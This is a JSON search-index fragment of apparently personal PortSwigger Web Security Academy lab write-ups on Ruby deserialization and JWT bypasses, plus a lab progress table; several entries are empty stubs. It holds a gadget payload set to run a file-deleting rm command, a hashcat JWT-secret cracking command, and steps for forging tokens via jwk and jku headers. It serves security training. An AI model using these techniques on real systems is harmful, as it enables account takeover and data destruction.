                            # Burp solution\n1. Log in to your own account and notice that the session cookie contains a serialized (\"marshaled\") Ruby object. Send a request containing this session cookie to Burp Repeater.\n2. Browse the web to find the `Universal Deserialisation Gadget for Ruby 2.x-3.x` by `vakzz` on `devcraft.io`. Copy the final script for generating the payload.\n3. Modify the script as follows:\n    - Change the command that should be executed from `id` to `rm /home/carlos/morale.txt`.\n    - Replace the final two lines with `puts Base64.encode64(payload)`. This ensures that the payload is output in the correct format for you to use for the lab.\n4. Run the script and copy the resulting Base64-encoded object.\n5. In Burp Repeater, replace your session cookie with the malicious one that you just created, then URL encode it.\n6. Send the request to solve the lab.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_7","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_7","title":"Solution","text":"
                            # Burp solution\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j_1","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_8","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_8","title":"Solution","text":"
                            # Burp solution\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j_2","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_9","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_9","title":"Solution","text":"
                            # Burp solution\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-jwt/","title":"BurpSuite Labs - Json Web Token jwt","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-unverified-signature","title":"JWT authentication bypass via unverified signature","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation","title":"Enunciation","text":"

                            This lab uses a JWT-based mechanism for handling sessions. Due to implementation flaws, the server doesn't verify the signature of any JWTs that it receives.

                            To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution","title":"Solution","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-flawed-signature-verification","title":"JWT authentication bypass via flawed signature verification","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_1","title":"Enunciation","text":"

                            This lab uses a JWT-based mechanism for handling sessions. The server is insecurely configured to accept unsigned JWTs.

                            To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_1","title":"Solution","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-weak-signing-key","title":"JWT authentication bypass via weak signing key","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_2","title":"Enunciation","text":"

                            This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets.

                            To solve the lab, first brute-force the website's secret key. Once you've obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_2","title":"Solution","text":"

                            Capture the JWT of the wiener user and run hashcat with a well-known dictionary of JWT secrets, such as https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

                            # -a 0: dictionary attack; -m 16500: JWT (JSON Web Token) hash mode\nhashcat -a 0 -m 16500 capturedJWT <wordlist>\n

                            Results:

                            eyJraWQiOiI2YTNmZjdmMi0xMDNmLTQyZGEtYmNkZC0yN2JiZmM4ZTU3OTQiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxNDYwMTIyNSwic3ViIjoid2llbmVyIn0.AeWLmJpWTsA-c-dA5j6UHIQ-f9Mo6F9Y-OrXBsGu6Gw:secret1\n

                            Open JWT Editor, go to the Keys tab, and generate a new symmetric key, replacing the k value with the Base64-encoded secret you just recovered.

                            Send your request to Repeater, go to the JSON Web Token tab, change the username to administrator, click Sign, and select your key. Change the endpoint to /admin and send the request.

                            Trigger the delete-user endpoint for carlos (the same endpoint as in the other labs on this page):
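
                            GET /admin/delete?username=carlos\n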

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-jwk-header-injection","title":"JWT authentication bypass via jwk header injection","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_3","title":"Enunciation","text":"

                            This lab uses a JWT-based mechanism for handling sessions. The server supports the jwk parameter in the JWT header. This is sometimes used to embed the correct verification key directly in the token. However, it fails to check whether the provided key came from a trusted source.

                            To solve the lab, modify and sign a JWT that gives you access to the admin panel at /admin, then delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_3","title":"Solution","text":"

                            Capture the wiener JWT and send the GET /admin request to the Repeater module. Once there, go to the JSON Web Token tab, embed a newly generated RSA public key in the token header (JWT Editor's Attack > Embedded JWK), change the sub claim to administrator, and send the request.
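
                            The token header after the attack looks roughly like this (a sketch; the key values are placeholders generated by the extension):

                            { \"kid\": \"<key-id>\", \"alg\": \"RS256\", \"jwk\": { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"<key-id>\", \"n\": \"<modulus>\" } }\n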

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-jku-header-injection","title":"JWT authentication bypass via jku header injection","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_4","title":"Enunciation","text":"

                            This lab uses a JWT-based mechanism for handling sessions. The server supports the jku parameter in the JWT header. However, it fails to check whether the provided URL belongs to a trusted domain before fetching the key.

                            To solve the lab, forge a JWT that gives you access to the admin panel at /admin, then delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_4","title":"Solution","text":"
                            ##### Part 1 - Upload a malicious JWK Set\n\n1. In Burp, load the JWT Editor extension from the BApp store.\n\n2. In the lab, log in to your own account and send the post-login `GET /my-account` request to Burp Repeater.\n\n3. In Burp Repeater, change the path to `/admin` and send the request. Observe that the admin panel is only accessible when logged in as the `administrator` user.\n\n4. Go to the **JWT Editor Keys** tab in Burp's main tab bar.\n\n5. Click **New RSA Key**.\n\n6. In the dialog, click **Generate** to automatically generate a new key pair, then click **OK** to save the key. Note that you don't need to select a key size as this will automatically be updated later.\n\n7. In the browser, go to the exploit server.\n\n8. Replace the contents of the **Body** section with an empty JWK Set as follows:\n\n    `{ \"keys\": [ ] }`\n9. Back on the **JWT Editor Keys** tab, right-click on the entry for the key that you just generated, then select **Copy Public Key as JWK**.\n\n10. Paste the JWK into the `keys` array on the exploit server, then store the exploit. The result should look something like this:\n\n    `{ \"keys\": [ { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"893d8f0b-061f-42c2-a4aa-5056e12b8ae7\", \"n\": \"yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw\" } ] }`\n\n##### Part 2 - Modify and sign the JWT\n\n1. Go back to the `GET /admin` request in Burp Repeater and switch to the extension-generated **JSON Web Token** message editor tab.\n\n2. In the header of the JWT, replace the current value of the `kid` parameter with the `kid` of the JWK that you uploaded to the exploit server.\n\n3. Add a new `jku` parameter to the header of the JWT. Set its value to the URL of your JWK Set on the exploit server.\n\n4. In the payload, change the value of the `sub` claim to `administrator`.\n\n5. At the bottom of the tab, click **Sign**, then select the RSA key that you generated in the previous section.\n\n6. Make sure that the **Don't modify header** option is selected, then click **OK**. The modified token is now signed with the correct signature.\n\n7. Send the request. Observe that you have successfully accessed the admin panel.\n\n8. In the response, find the URL for deleting `carlos` (`/admin/delete?username=carlos`). Send the request to this endpoint to solve the lab.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_5","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_5","title":"Solution","text":"

                            I

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b_1","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_6","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_6","title":"Solution","text":"

                            I

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b_2","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_7","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_7","title":"Solution","text":"

                            I

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-labs/","title":"BurpSuite Labs","text":"","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#sql-injection","title":"SQL injection","text":"Solution SQL injection level link Solved sqli-1 SQL injection Apprentice SQL injection vulnerability in WHERE clause allowing retrieval of hidden data Solved sqli-2 SQL injection Apprentice SQL injection vulnerability allowing login bypass Solved sqli-3 SQL injection Practitioner SQL injection UNION attack, determining the number of columns returned by the query Solved sqli-4 SQL injection Practitioner SQL injection UNION attack, finding a column containing text Solved sqli-5 SQL injection Practitioner SQL injection UNION attack, retrieving data from other tables Solved sqli-6 SQL injection Practitioner SQL injection UNION attack, retrieving multiple values in a single column Solved SQL injection Practitioner SQL injection attack, querying the database type and version on Oracle Not solved SQL injection Practitioner SQL injection attack, querying the database type and version on MySQL and Microsoft Not solved SQL injection Practitioner SQL injection attack, listing the database contents on non-Oracle databases Not solved SQL injection Practitioner SQL injection attack, listing the database contents on Oracle Not solved SQL injection Practitioner Blind SQL injection with conditional responses Not solved SQL injection Practitioner Blind SQL injection with conditional errors Not solved SQL injection Practitioner Blind SQL injection with time delays Not solved SQL injection Practitioner Blind SQL injection with time delays and information retrieval Not solved SQL injection Practitioner Blind SQL injection with out-of-band interaction Not solved SQL injection Practitioner Blind SQL injection with out-of-band data exfiltration Not solved SQL injection Practitioner SQL injection with filter bypass via XML encoding Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-site-scripting","title":"Cross-site scripting","text":"Solution level link Solved Solution xss-1 Cross-site scripting Apprentice Reflected XSS into HTML context with nothing encoded Solved xss-2 Cross-site scripting Apprentice Stored XSS into HTML context with nothing encoded Solved xss-3 Cross-site scripting Apprentice DOM XSS in\u00a0document.write\u00a0sink using source\u00a0location.search Solved xss-4 Cross-site scripting Apprentice DOM XSS in\u00a0innerHTML\u00a0sink using source\u00a0location.search Solved xss-5 Cross-site scripting Apprentice DOM XSS in jQuery anchor\u00a0href\u00a0attribute sink using\u00a0location.search\u00a0source Solved xss-6 Cross-site scripting Apprentice DOM XSS in jQuery selector sink using a hashchange event Solved Cross-site scripting Apprentice Reflected XSS into attribute with angle brackets HTML-encoded Not solved Cross-site scripting Apprentice Stored XSS into anchor\u00a0href\u00a0attribute with double quotes HTML-encoded Not solved Cross-site scripting Apprentice Reflected XSS into a JavaScript string with angle brackets HTML encoded Not solved Cross-site scripting (burpsuite-xss.md) Practitioner DOM XSS in\u00a0document.write\u00a0sink using source\u00a0location.search\u00a0inside a select element Not solved Cross-site scripting Practitioner DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded Not solved Cross-site scripting Practitioner Reflected DOM XSS Not solved Cross-site scripting Practitioner 
Stored DOM XSS Not solved Cross-site scripting Practitioner Exploiting cross-site scripting to steal cookies Not solved Cross-site scripting Practitioner Exploiting cross-site scripting to capture passwords Not solved Cross-site scripting Practitioner Exploiting XSS to perform CSRF Not solved Cross-site scripting Practitioner Reflected XSS into HTML context with most tags and attributes blocked Not solved Cross-site scripting Practitioner Reflected XSS into HTML context with all tags blocked except custom ones Not solved Cross-site scripting Practitioner Reflected XSS with some SVG markup allowed Not solved Cross-site scripting Practitioner Reflected XSS in canonical link tag Not solved Cross-site scripting Practitioner Reflected XSS into a JavaScript string with single quote and backslash escaped Not solved Cross-site scripting Practitioner Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped Not solved Cross-site scripting Practitioner Stored XSS into\u00a0onclick\u00a0event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped Not solved Cross-site scripting Practitioner Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped Not solved Cross-site scripting Expert Reflected XSS with event handlers and\u00a0href\u00a0attributes blocked Not solved Cross-site scripting Expert Reflected XSS in a JavaScript URL with some characters blocked Not solved Cross-site scripting Expert Reflected XSS with AngularJS sandbox escape without strings Not solved Cross-site scripting Expert Reflected XSS with AngularJS sandbox escape and CSP Not solved Cross-site scripting Expert Reflected XSS protected by very strict CSP, with dangling markup attack Not solved Cross-site scripting Expert Reflected XSS protected by CSP, with CSP bypass Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-site-request-forgery","title":"Cross-Site Request Forgery","text":"Cross-site Request Forgery level link Solved Cross-site Request Forgery Apprentice CSRF vulnerability with no defenses Not solved Cross-site Request Forgery Practitioner CSRF where token validation depends on request method Not solved Cross-site Request Forgery Practitioner CSRF where token validation depends on token being present Not solved Cross-site Request Forgery Practitioner CSRF where token is not tied to user session Not solved Cross-site Request Forgery Practitioner CSRF where token is tied to non-session cookie Not solved Cross-site Request Forgery Practitioner CSRF where token is duplicated in cookie Not solved Cross-site Request Forgery Practitioner SameSite Lax bypass via method override Not solved Cross-site Request Forgery Practitioner SameSite Strict bypass via client-side redirect Not solved Cross-site Request Forgery Practitioner SameSite Strict bypass via sibling domain Not solved Cross-site Request Forgery Practitioner SameSite Lax bypass via cookie refresh Not solved Cross-site Request Forgery Practitioner CSRF where Referer validation depends on header being present Not solved Cross-site Request Forgery Practitioner CSRF with broken Referer validation Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#clickjacking","title":"Clickjacking","text":"Clikjacking level link Solved Clikjacking Apprentice Basic clickjacking with CSRF token protection Not solved Clikjacking Apprentice Clickjacking with form input data prefilled from a 
URL parameter Not solved Clikjacking Apprentice Clickjacking with a frame buster script Not solved Clikjacking Practitioner Exploiting clickjacking vulnerability to trigger DOM-based XSS Not solved Clikjacking Practitioner Multistep clickjacking Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#dom-based-vulnerabilities","title":"DOM-based vulnerabilities","text":"DOM-based vulnerabilities level link Solved DOM-based vulnerabilities Practitioner DOM XSS using web messages Not solved DOM-based vulnerabilities Practitioner DOM XSS using web messages and a JavaScript URL Not solved DOM-based vulnerabilities Practitioner DOM XSS using web messages and\u00a0JSON.parse Not solved DOM-based vulnerabilities Practitioner DOM-based open redirection Not solved DOM-based vulnerabilities Practitioner DOM-based cookie manipulation Not solved DOM-based vulnerabilities Expert Exploiting DOM clobbering to enable XSS Not solved DOM-based vulnerabilities Expert Clobbering DOM attributes to bypass HTML filters Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-origin-resource-sharing","title":"Cross-origin resource sharing","text":"Cross-origin resource sharing level link Solved Cross-origin resource sharing Apprentice CORS vulnerability with basic origin reflection Not solved Cross-origin resource sharing Apprentice CORS vulnerability with trusted null origin Not solved Cross-origin resource sharing Practitioner CORS vulnerability with trusted insecure protocols Not solved Cross-origin resource sharing Expert CORS vulnerability with internal network pivot attack Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#xml-external-entity","title":"XML external entity","text":"XML external entity level link Solved xxe-1 Apprentice Exploiting XXE using external entities to retrieve files Solved xxe-2 Apprentice Exploiting XXE to perform SSRF attacks Solved xxe-3 Practitioner Blind XXE with out-of-band interaction Solved xxe-4 Practitioner Blind XXE with out-of-band interaction via XML parameter entities Solved xxe-5 Practitioner Exploiting blind XXE to exfiltrate data using a malicious external DTD Solved xxe-6 Practitioner Exploiting blind XXE to retrieve data via error messages Solved xxe-7 Practitioner Exploiting XInclude to retrieve files Solved xxe-8 Practitioner Exploiting XXE via image file upload Solved xxe-9 Expert Exploiting XXE to retrieve data by repurposing a local DTD Solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#server-side-request-forgery","title":"Server-side request forgery","text":"Server-side request forgery level link Solved ssrf-1 Server-side request forgery Apprentice Basic SSRF against the local server Solved ssrf-2 Server-side request forgery Apprentice Basic SSRF against another back-end system Solved ssrf-3 Server-side request forgery Practitioner SSRF with blacklist-based input filter Solved ssrf-4 Server-side request forgery Practitioner SSRF with filter bypass via open redirection vulnerability Not solved Server-side request forgery Practitioner Blind SSRF with out-of-band detection Not solved Server-side request forgery Expert SSRF with whitelist-based input filter Not solved Server-side request forgery Expert Blind SSRF with Shellshock exploitation Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#http-request-smuggling","title":"HTTP request smuggling","text":"HTTP request smuggling level link Solved HTTP request smuggling Practitioner HTTP request smuggling, basic 
CL.TE vulnerability Not solved HTTP request smuggling Practitioner HTTP request smuggling, basic TE.CL vulnerability Not solved HTTP request smuggling Practitioner HTTP request smuggling, obfuscating the TE header Not solved HTTP request smuggling Practitioner HTTP request smuggling, confirming a CL.TE vulnerability via differential responses Not solved HTTP request smuggling Practitioner HTTP request smuggling, confirming a TE.CL vulnerability via differential responses Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to reveal front-end request rewriting Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to capture other users' requests Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to deliver reflected XSS Not solved HTTP request smuggling Practitioner Response queue poisoning via H2.TE request smuggling Not solved HTTP request smuggling Practitioner H2.CL request smuggling Not solved HTTP request smuggling Practitioner HTTP/2 request smuggling via CRLF injection Not solved HTTP request smuggling Practitioner HTTP/2 request splitting via CRLF injection Not solved HTTP request smuggling Practitioner CL.0 request smuggling Not solved HTTP request smuggling Expert Exploiting HTTP request smuggling to perform web cache poisoning Not solved HTTP request smuggling Expert Exploiting HTTP request smuggling to perform web cache deception Not solved HTTP request smuggling Expert Bypassing access controls via HTTP/2 request tunnelling Not solved HTTP request smuggling Expert Web cache poisoning via HTTP/2 request tunnelling Not solved HTTP request smuggling Expert Client-side desync Not solved HTTP request smuggling Expert Browser cache poisoning via client-side desync Not solved HTTP request smuggling Expert Server-side pause-based request smuggling Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#os-command-injection","title":"OS command injection","text":"OS command injection level link Solved OS command injection Apprentice OS command injection, simple case Not solved OS command injection Practitioner Blind OS command injection with time delays Not solved OS command injection Practitioner Blind OS command injection with output redirection Not solved OS command injection Practitioner Blind OS command injection with out-of-band interaction Not solved OS command injection Practitioner Blind OS command injection with out-of-band data exfiltration Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#server-side-template-injection","title":"Server-side template injection","text":"Solution Server-side template injection level link Solved ssti-1 Server-side template injection Practitioner Basic server-side template injection Solved ssti-2 Server-side template injection Practitioner Basic server-side template injection (code context) Solved ssti-3 Server-side template injection Practitioner Server-side template injection using documentation Solved ssti-4 Server-side template injection Practitioner Server-side template injection in an unknown language with a documented exploit Solved ssti-5 Server-side template injection Practitioner Server-side template injection with information disclosure 
via user-supplied objects Solved ssti-6 Server-side template injection Expert Server-side template injection in a sandboxed environment Solved Server-side template injection Expert Server-side template injection with a custom exploit Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#directory-traversal","title":"Directory traversal","text":"Directory traversal level link Solved Directory traversal Apprentice File path traversal, simple case Not solved Directory traversal Practitioner File path traversal, traversal sequences blocked with absolute path bypass Not solved Directory traversal Practitioner File path traversal, traversal sequences stripped non-recursively Not solved Directory traversal Practitioner File path traversal, traversal sequences stripped with superfluous URL-decode Not solved Directory traversal Practitioner File path traversal, validation of start of path Not solved Directory traversal Practitioner File path traversal, validation of file extension with null byte bypass Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#access-control-vulnerabilities","title":"Access control vulnerabilities","text":"Solution Access control vulnerabilities level link Solved access-1 Access control vulnerabilities Apprentice Unprotected admin functionality Solved access-2 Access control vulnerabilities Apprentice Unprotected admin functionality with unpredictable URL Solved access-3 Access control vulnerabilities Apprentice User role controlled by request parameter Solved access-4 Access control vulnerabilities Apprentice User role can be modified in user profile Solved access-5 Access control vulnerabilities Apprentice User ID controlled by request parameter Solved access-6 Access control vulnerabilities Apprentice User ID controlled by request parameter, with unpredictable user IDs Solved access-7 Access control vulnerabilities Apprentice User ID controlled by request parameter with data leakage in redirect Solved access-8 Access control vulnerabilities Apprentice User ID controlled by request parameter with password disclosure Solved access-9 Access control vulnerabilities Apprentice Insecure direct object references Solved access-10 Access control vulnerabilities Practitioner URL-based access control can be circumvented Solved access-11 Access control vulnerabilities Practitioner Method-based access control can be circumvented Solved access-12 Access control vulnerabilities Practitioner Multi-step process with no access control on one step Solved access-13 Access control vulnerabilities Practitioner Referer-based access control Solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#authentication","title":"Authentication","text":"Authentication level link Solved Authentication Apprentice Username enumeration via different responses Not solved Authentication Apprentice 2FA simple bypass Not solved Authentication Apprentice Password reset broken logic Not solved Authentication Practitioner Username enumeration via subtly different responses Not solved Authentication Practitioner Username enumeration via response timing Not solved Authentication Practitioner Broken brute-force protection, IP block Not solved Authentication Practitioner Username enumeration via account lock Not solved Authentication Practitioner 2FA broken logic Not solved Authentication Practitioner Brute-forcing a stay-logged-in cookie Not solved Authentication Practitioner Offline password cracking Not solved Authentication Practitioner Password reset poisoning 
via middleware Not solved Authentication Practitioner Password brute-force via password change Not solved Authentication Expert Broken brute-force protection, multiple credentials per request Not solved Authentication Expert 2FA bypass using a brute-force attack Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#websockets","title":"WebSockets","text":"WebSockets level link Solved WebSockets Apprentice Manipulating WebSocket messages to exploit vulnerabilities Not solved WebSockets Practitioner Manipulating the WebSocket handshake to exploit vulnerabilities Not solved WebSockets Practitioner Cross-site WebSocket hijacking Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#web-cache-poisoning","title":"Web cache poisoning","text":"Web cache poisoning level link Solved Web cache poisoning Practitioner Web cache poisoning with an unkeyed header Not solved Web cache poisoning Practitioner Web cache poisoning with an unkeyed cookie Not solved Web cache poisoning Practitioner Web cache poisoning with multiple headers Not solved Web cache poisoning Practitioner Targeted web cache poisoning using an unknown header Not solved Web cache poisoning Practitioner Web cache poisoning via an unkeyed query string Not solved Web cache poisoning Practitioner Web cache poisoning via an unkeyed query parameter Not solved Web cache poisoning Practitioner Parameter cloaking Not solved Web cache poisoning Practitioner Web cache poisoning via a fat GET request Not solved Web cache poisoning Practitioner URL normalization Not solved Web cache poisoning Expert Web cache poisoning to exploit a DOM vulnerability via a cache with strict cacheability criteria Not solved Web cache poisoning Expert Combining web cache poisoning vulnerabilities Not solved Web cache poisoning Expert Cache key injection Not solved Web cache poisoning Expert Internal cache poisoning Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#insecure-deserialization","title":"Insecure deserialization","text":"Insecure deserialization level link Solved Insecure deserialization Apprentice Modifying serialized objects Not solved Insecure deserialization Practitioner Modifying serialized data types Not solved Insecure deserialization Practitioner Using application functionality to exploit insecure deserialization Not solved Insecure deserialization Practitioner Arbitrary object injection in PHP Not solved Insecure deserialization Practitioner Exploiting Java deserialization with Apache Commons Not solved Insecure deserialization Practitioner Exploiting PHP deserialization with a pre-built gadget chain Not solved Insecure deserialization Practitioner Exploiting Ruby deserialization using a documented gadget chain Not solved Insecure deserialization Expert Developing a custom gadget chain for Java deserialization Not solved Insecure deserialization Expert Developing a custom gadget chain for PHP deserialization Not solved Insecure deserialization Expert Using PHAR deserialization to deploy a custom gadget chain Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#information-disclosure","title":"Information disclosure","text":"Information disclosure level link Solved Information disclosure Apprentice Information disclosure in error messages Not solved Information disclosure Apprentice Information disclosure on debug page Not solved Information disclosure Apprentice Source code disclosure via backup files Not solved Information disclosure Apprentice Authentication bypass 
via information disclosure Not solved Information disclosure Practitioner Information disclosure in version control history Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#business-logic-vulnerabilities","title":"Business logic vulnerabilities","text":"Business logic vulnerabilities level link Solved Business logic vulnerabilities Apprentice Excessive trust in client-side controls Not solved Business logic vulnerabilities Apprentice High-level logic vulnerability Not solved Business logic vulnerabilities Apprentice Inconsistent security controls Not solved Business logic vulnerabilities Apprentice Flawed enforcement of business rules Not solved Business logic vulnerabilities Practitioner Low-level logic flaw Not solved Business logic vulnerabilities Practitioner Inconsistent handling of exceptional input Not solved Business logic vulnerabilities Practitioner Weak isolation on dual-use endpoint Not solved Business logic vulnerabilities Practitioner Insufficient workflow validation Not solved Business logic vulnerabilities Practitioner Authentication bypass via flawed state machine Not solved Business logic vulnerabilities Practitioner Infinite money logic flaw Not solved Business logic vulnerabilities Practitioner Authentication bypass via encryption oracle Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#http-host-header-attacks","title":"HTTP Host header attacks","text":"HTTP Host header attacks level link Solved HTTP Host header attacks Apprentice Basic password reset poisoning Not solved HTTP Host header attacks Apprentice Host header authentication bypass Not solved HTTP Host header attacks Practitioner Web cache poisoning via ambiguous requests Not solved HTTP Host header attacks Practitioner Routing-based SSRF Not solved HTTP Host header attacks Practitioner SSRF via flawed request parsing Not solved HTTP Host header attacks Practitioner Host validation bypass via connection state attack Not solved HTTP Host header attacks Expert Password reset poisoning via dangling markup Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#oauth-authentication","title":"OAuth authentication","text":"OAuth authentication level link Solved OAuth authentication Apprentice Authentication bypass via OAuth implicit flow Not solved OAuth authentication Practitioner Forced OAuth profile linking Not solved OAuth authentication Practitioner OAuth account hijacking via redirect_uri Not solved OAuth authentication Practitioner Stealing OAuth access tokens via an open redirect Not solved OAuth authentication Practitioner SSRF via OpenID dynamic client registration Not solved OAuth authentication Expert Stealing OAuth access tokens via a proxy page Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#file-upload-vulnerabilities","title":"File upload vulnerabilities","text":"File upload vulnerabilities level link Solved File upload vulnerabilities Apprentice Remote code execution via web shell upload Not solved File upload vulnerabilities Apprentice Web shell upload via Content-Type restriction bypass Not solved File upload vulnerabilities Practitioner Web shell upload via path traversal Not solved File upload vulnerabilities Practitioner Web shell upload via extension blacklist bypass Not solved File upload vulnerabilities Practitioner Web shell upload via obfuscated file extension Not solved File upload vulnerabilities Practitioner Remote code execution via polyglot web shell upload Not solved File upload vulnerabilities 
Expert Web shell upload via race condition Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#jwt","title":"JWT","text":"JWT level link Solved JWT-1 Apprentice JWT authentication bypass via unverified signature Solved JWT-2 Apprentice JWT authentication bypass via flawed signature verification Solved JWT-3 Practitioner JWT authentication bypass via weak signing key Solved JWT-4 Practitioner JWT authentication bypass via jwk header injection Solved JWT-5 Practitioner JWT authentication bypass via jku header injection Solved Practitioner JWT authentication bypass via kid header path traversal Not solved Expert JWT authentication bypass via algorithm confusion Not solved Expert JWT authentication bypass via algorithm confusion with no exposed key Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#essential-skills","title":"Essential skills","text":"Essential skills level link Solved Essential skills Practitioner Discovering vulnerabilities quickly with targeted scanning Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#prototype-pollution","title":"Prototype pollution","text":"Prototype pollution level link Solved Prototype pollution Practitioner DOM XSS via client-side prototype pollution Not solved Prototype pollution Practitioner DOM XSS via an alternative prototype pollution vector Not solved Prototype pollution Practitioner Client-side prototype pollution in third-party libraries Not solved Prototype pollution Practitioner Client-side prototype pollution via browser APIs Not solved Prototype pollution Practitioner Client-side prototype pollution via flawed sanitization Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-sqli/","title":"BurpSuite Labs - SQL injection","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-vulnerability-in-where-clause-allowing-retrieval-of-hidden-data","title":"SQL injection vulnerability in WHERE clause allowing retrieval of hidden 